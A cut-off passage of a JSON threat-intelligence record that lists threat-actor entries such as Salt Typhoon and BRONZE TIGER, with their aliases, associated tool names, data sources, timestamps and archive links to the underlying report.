				"NBTscan",
				"NinjaCopy",
				"ProcDump",
				"PsExec",
				"PsList",
				"SnappyBee",
				"SparrowDoor",
				"TrillClient",
				"WinRAR",
				"Zingdoor",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fcff864b-9255-49cf-9d9b-2b9cb2ad7cff",
			"created_at": "2025-04-23T02:00:55.190165Z",
			"updated_at": "2026-04-10T02:00:05.361244Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Salt Typhoon"
			],
			"source_name": "MITRE:Salt Typhoon",
			"tools": [
				"JumbledPath"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6477a057-a76b-4b60-9135-b21ee075ca40",
			"created_at": "2025-11-01T02:04:53.060656Z",
			"updated_at": "2026-04-10T02:00:03.845594Z",
			"deleted_at": null,
			"main_name": "BRONZE TIGER",
			"aliases": [
				"Earth Estries ",
				"Famous Sparrow ",
				"Ghost Emperor ",
				"RedMike ",
				"Salt Typhoon "
			],
			"source_name": "Secureworks:BRONZE TIGER",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434083,
	"ts_updated_at": 1775826730,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.pdf",
		"text": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.txt",
		"img": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.jpg"
	}
}